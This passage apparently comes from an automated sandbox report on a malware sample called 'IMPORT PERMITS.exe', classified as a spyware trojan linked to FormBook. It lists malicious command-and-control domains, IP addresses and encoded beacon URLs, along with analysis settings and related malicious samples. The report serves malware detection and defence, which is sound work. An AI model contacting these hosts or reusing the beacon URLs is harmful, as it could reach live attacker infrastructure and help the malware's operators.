                http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.fontbureau.com/designers80%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.dbasky.net
                		34.92.109.131
                		truefalseunknown
                www.zoptra.info
                		162.0.211.143
                		truetrue
                  		unknown
                  official.roamimg.strawberrycdn.com
                  		103.233.82.58
                  		truetrue
                    		unknown
                    bocadolobopetra.net
                    		3.33.130.190
                    		truetrue
                      		unknown
                      litsgs.vip
                      		3.33.130.190
                      		truetrue
                        		unknown
                        44kdd.top
                        		38.47.232.160
                        		truetrue
                          		unknown
                          www.broork.sbs
                          		163.44.176.12
                          		truetrue
                            		unknown
                            roopiedutech.online
                            		103.191.208.137
                            		truetrue
                              		unknown
                              nutrigenfit.online
                              		195.110.124.133
                              		truetrue
                                		unknown
                                beautyconcernsusa.net
                                		216.219.93.17
                                		truetrue
                                  		unknown
                                  www.redex.fun
                                  		185.68.16.94
                                  		truetrue
                                    		unknown
                                    www.deepfy.xyz
                                    		199.59.243.227
                                    		truetrue
                                      		unknown
                                      www.7wkto5nk230724z.click
                                      		172.67.131.32
                                      		truetrue
                                        		unknown
                                        suree.bet
                                        		3.33.130.190
                                        		truetrue
                                          		unknown
                                          www.44kdd.top
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.abistra.store
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.litsgs.vip
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.suree.bet
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.bocadolobopetra.net
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.cmdh1c.xyz
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.beautyconcernsusa.net
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.roopiedutech.online
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown
                                                          171.39.242.20.in-addr.arpa
                                                          		unknown
                                                          		unknownfalse
                                                            		unknown
                                                            www.nutrigenfit.online
                                                            		unknown
                                                            		unknownfalse
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.7wkto5nk230724z.click/c2q3/true
                                                                		unknown
                                                                http://www.roopiedutech.online/w5is/true
                                                                  		unknown
                                                                  http://www.nutrigenfit.online/uhg3/true
                                                                    		unknown
                                                                    http://www.broork.sbs/51fd/true
                                                                      		unknown
                                                                      http://www.deepfy.xyz/t7p4/true
                                                                        		unknown
                                                                        http://www.roopiedutech.online/w5is/?Z0WTZ=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg=&SJuP9=UPQLWRgHAD_true
                                                                          		unknown
                                                                          http://www.broork.sbs/51fd/?Z0WTZ=5XThc+sTNfSc1dyVCHius6QJlgyE7UD3g9QPrW9D0ZCA6InRQfgmSS7sY3ZsEANqCFm0SxAy1XScT67z0IieRfxf0Cr6BzHBArQcGKRuou4FU1nhplefNR0=&SJuP9=UPQLWRgHAD_true
                                                                            		unknown
                                                                            http://www.redex.fun/pjcb/?SJuP9=UPQLWRgHAD_&Z0WTZ=mR41NwlPpWSeNv3ogRNiaiaxYZXyC1SkAJjbD/qSc2ukVSLu6jyn16P/AoWnmXjc847+20hqOz4nW3sR+UY1qAEpIZA0h6plj49hN8QYEBC/SES4lZybD8k=true
                                                                              		unknown
                                                                              http://www.redex.fun/pjcb/true
                                                                                		unknown
                                                                                http://www.7wkto5nk230724z.click/c2q3/?Z0WTZ=j/0mpNm2Bsp7DIZ0lL93uSEy3O7+v2qbjKVTngZW+fxoFlp5b+1ximLQJstL0djCplBlCo8niZKHcOIqzu0BFGSn0M5MS0dRMByh0HJ4/jaoTuMehM4oDS0=&SJuP9=UPQLWRgHAD_true
                                                                                  		unknown
                                                                                  http://www.zoptra.info/icpx/true
                                                                                    		unknown
                                                                                    http://www.suree.bet/mgme/?Z0WTZ=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&SJuP9=UPQLWRgHAD_true
                                                                                      		unknown
                                                                                      http://www.bocadolobopetra.net/4q66/true
                                                                                        		unknown
                                                                                        http://www.litsgs.vip/a1y9/?SJuP9=UPQLWRgHAD_&Z0WTZ=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE=true
                                                                                          		unknown
                                                                                          http://www.bocadolobopetra.net/4q66/?Z0WTZ=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&SJuP9=UPQLWRgHAD_true
                                                                                            		unknown
                                                                                            http://www.deepfy.xyz/t7p4/?SJuP9=UPQLWRgHAD_&Z0WTZ=l9a7eDheKRZy9bhcTeCHdToYa6mt3ij4C0pbULzToM8sx4gmKc4u2ZHXAvhfaYH7/T0zUvL9+kkqYwdWGnSBKq2rvPWRIuzqlymkkYj2zkimPtA3jZhNuM4=true
                                                                                              		unknown
                                                                                              http://www.zoptra.info/icpx/?Z0WTZ=EWEf4eOOpXzvErl7RdF5qy2I3vzfoFn6qWFMKyXoxLDqmpyGz4laiprjdpsB5hfyQE5UJ9beIy4J0yBeSjcOCjXGgmEr9dkECjGb/w9fv9zko2b6bEiJ13U=&SJuP9=UPQLWRgHAD_true
                                                                                                		unknown
                                                                                                http://www.44kdd.top/wh1i/?Z0WTZ=NfOB86VXI4wsVz/XO9ACyDnBWrbPRq/QJ2w3Rs+6xYlcxVFOr5mbmHJ2iOb+4RiHynZrudFNXkx38yGLhxQe11Zee6oqKWgky3dD2swdesJmFdrAGLP7kwM=&SJuP9=UPQLWRgHAD_true
                                                                                                  		unknown
                                                                                                  http://www.nutrigenfit.online/uhg3/?Z0WTZ=BYkW8sJ9y3cOHNEoRxCwA5Vo4ahPFjBVLPr9x2y6ZT42IcqGpiutRD9HR4qSfel6nhfbupoEu3BM2yJdNDd6onHQNeQ4qPh2tk8usD30jryO8epkJ7XZGNI=&SJuP9=UPQLWRgHAD_true
                                                                                                    		unknown
                                                                                                    http://www.cmdh1c.xyz/6byd/?Z0WTZ=cJlBP4gdQg33LxRaxIBB9TpDVwunrRcR6TPzX8fihpDKfN+C3z32iLCDUP2OAgtSF65Fjxsz3xegGgg43kjMMLGB+pU0EQVXDohFVmD6n/q0/xsVCvDFB+8=&SJuP9=UPQLWRgHAD_true
                                                                                                      		unknown
                                                                                                      http://www.dbasky.net/qgza/false
                                                                                                        		unknown
                                                                                                        http://www.cmdh1c.xyz/6byd/true
                                                                                                          		unknown
                                                                                                          http://www.44kdd.top/wh1i/true
                                                                                                            		unknown
                                                                                                            http://www.suree.bet/mgme/true
                                                                                                              		unknown

                                                                                                              URLs from Memory and Binaries

                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                              https://duckduckgo.com/chrome_newtabPATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.fontbureau.com/designersGIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://duckduckgo.com/ac/?q=PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://www.fontbureau.com/designers/?IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://cdn.adm.tools/parking-page/style.cssPATHPING.EXE, 00000007.00000002.4122469051.0000000004668000.00000004.10000000.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000004748000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.founder.com.cn/cn/bTheIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.fontbureau.com/designers?IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.tiro.comIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.fontbureau.com/designersIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.goodfont.co.krIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://roopiedutech.online/w5is/?Z0WTZ=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vPATHPING.EXE, 00000007.00000002.4122469051.00000000039D8000.00000004.10000000.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000003AB8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.sajatypeworks.comIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.typography.netDIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://www.google.comPATHPING.EXE, 00000007.00000002.4122469051.000000000498C000.00000004.10000000.00040000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4124184578.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000004A6C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.founder.com.cn/cn/cTheIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.galapagosdesign.com/staff/dennis.htmIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://tempuri.org/GameInfoDataSet.xsdGFinalProjectTV.Properties.ResourcesIMPORT PERMITS.exefalse
                                                                                                                      		unknown
                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.galapagosdesign.com/DPleaseIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.fonts.comIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.sandoll.co.krIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.urwpp.deDPleaseIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.zhongyicts.com.cnIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.sakkal.comIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.fontbureau.comIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://www.ecosia.org/newtab/PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.cmdh1c.xyzgKZXbGXeVZyo.exe, 00000008.00000002.4123927554.0000000005848000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.carterandcone.comlIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://ac.ecosia.org/autocomplete?q=PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.founder.com.cn/cnIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.fontbureau.com/designers/frere-user.htmlIMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.monotype.IMPORT PERMITS.exe, 00000000.00000002.1769255784.0000000005B40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.jiyu-kobo.co.jp/IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://www.fontbureau.com/designers8IMPORT PERMITS.exe, 00000000.00000002.1769285490.0000000006C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PATHPING.EXE, 00000007.00000002.4124302032.00000000075E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/PATHPING.EXE, 00000007.00000002.4122469051.0000000004668000.00000004.10000000.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4122240673.0000000004748000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		unknown

                                                                                                                              World Map of Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public IPs

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              163.44.176.12
                                                                                                                              		www.broork.sbsJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                              172.67.131.32
                                                                                                                              		www.7wkto5nk230724z.clickUnited States
                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                              38.47.232.160
                                                                                                                              		44kdd.topUnited States
                                                                                                                              		174COGENT-174UStrue
                                                                                                                              195.110.124.133
                                                                                                                              		nutrigenfit.onlineItaly
                                                                                                                              		39729REGISTER-ASITtrue
                                                                                                                              103.191.208.137
                                                                                                                              		roopiedutech.onlineunknown
                                                                                                                              		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                              162.0.211.143
                                                                                                                              		www.zoptra.infoCanada
                                                                                                                              		35893ACPCAtrue
                                                                                                                              185.68.16.94
                                                                                                                              		www.redex.funUkraine
                                                                                                                              		200000UKRAINE-ASUAtrue
                                                                                                                              199.59.243.227
                                                                                                                              		www.deepfy.xyzUnited States
                                                                                                                              		395082BODIS-NJUStrue
                                                                                                                              103.233.82.58
                                                                                                                              		official.roamimg.strawberrycdn.comThailand
                                                                                                                              		45652VPLSVPLSASIATHtrue
                                                                                                                              34.92.109.131
                                                                                                                              		www.dbasky.netUnited States
                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                              3.33.130.190
                                                                                                                              		bocadolobopetra.netUnited States
                                                                                                                              		8987AMAZONEXPANSIONGBtrue

                                                                                                                              General Information

                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                              Analysis ID:1547340
                                                                                                                              Start date and time:2024-11-02 08:10:05 +01:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 10m 28s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:9
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:2
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:IMPORT PERMITS.exe
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@16/11
                                                                                                                              EGA Information:
                                                                                                                              • Successful, ratio: 75%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 90%
                                                                                                                              • Number of executed functions: 95
                                                                                                                              • Number of non-executed functions: 280
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                              Warnings

                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              03:11:00API Interceptor1x Sleep call for process: IMPORT PERMITS.exe modified
                                                                                                                              03:12:10API Interceptor8846631x Sleep call for process: PATHPING.EXE modified

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              163.44.176.12draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.broork.sbs/51fd/
                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.broork.sbs/mivl/
                                                                                                                              172.67.131.32draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.7wkto5nk230724z.click/c2q3/
                                                                                                                              38.47.232.160DHL Express Doc 01143124.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.44kdd.top/zgb2/
                                                                                                                              draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.44kdd.top/wh1i/
                                                                                                                              DHL TRACKING.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.59vdd.top/2aw9/
                                                                                                                              195.110.124.133draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.nutrigenfit.online/uhg3/
                                                                                                                              HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.nutrigenfit.online/2vhi/
                                                                                                                              Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • www.nidedabeille.net/qkk1/
                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.nutrigenfit.online/uye5/
                                                                                                                              rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.nutrigenfit.online/938r/
                                                                                                                              OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.nutrigenfit.online/2vhi/
                                                                                                                              rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.elettrosistemista.zip/fo8o/
                                                                                                                              Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                              • www.nidedabeille.net/kp5a/
                                                                                                                              zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • www.nutrigenfit.online/8gyb/
                                                                                                                              TT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.nidedabeille.net/oy0l/

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              www.broork.sbsdraft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 163.44.176.12
                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 163.44.176.12
                                                                                                                              official.roamimg.strawberrycdn.comdraft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 103.233.82.58
                                                                                                                              www.zoptra.infodraft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 162.0.211.143

                                                                                                                              ASNs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              REGISTER-ASITdraft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • 81.88.48.71
                                                                                                                              Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 195.110.124.133
                                                                                                                              INTERQGMOInternetIncJPdraft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 163.44.176.12
                                                                                                                              http://3d1.gmobb.jp/dcm299ccyag4e/gov/Get hashmaliciousPhisherBrowse
                                                                                                                              • 133.130.64.224
                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 163.44.176.12
                                                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 118.27.39.62
                                                                                                                              splarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 133.130.30.78
                                                                                                                              ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 150.95.219.226
                                                                                                                              nklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 157.7.100.28
                                                                                                                              la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 160.251.222.180
                                                                                                                              yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                              • 118.27.125.181
                                                                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 133.130.35.90
                                                                                                                              CLOUDFLARENETUS#U2749VER CUENTA#U2749_#U2464#U2466#U2460#U2462#U2463#U2460#U2466#U2462.htaGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              6725c86d7fc7b.vbsGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              y445LJgbHB.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              2RSApyPwtP.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              8p4DVNCBTB.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              woqOhh17tj.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              zK3150CS8q.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              COGENT-174USA4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 154.23.184.185
                                                                                                                              nuklear.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 143.241.178.72
                                                                                                                              mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 206.232.91.38
                                                                                                                              sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 38.100.34.94
                                                                                                                              armv7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 149.50.116.115
                                                                                                                              x86_32.elfGet hashmaliciousGafgytBrowse
                                                                                                                              • 38.63.56.191
                                                                                                                              debug.dbg.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 38.171.134.102
                                                                                                                              upb.htaGet hashmaliciousUnknownBrowse
                                                                                                                              • 38.180.193.61
                                                                                                                              DHL Express Doc 01143124.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 38.47.232.160
                                                                                                                              DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 154.23.184.95

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IMPORT PERMITS.exe.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\IMPORT PERMITS.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1216
                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                              Encrypted:false
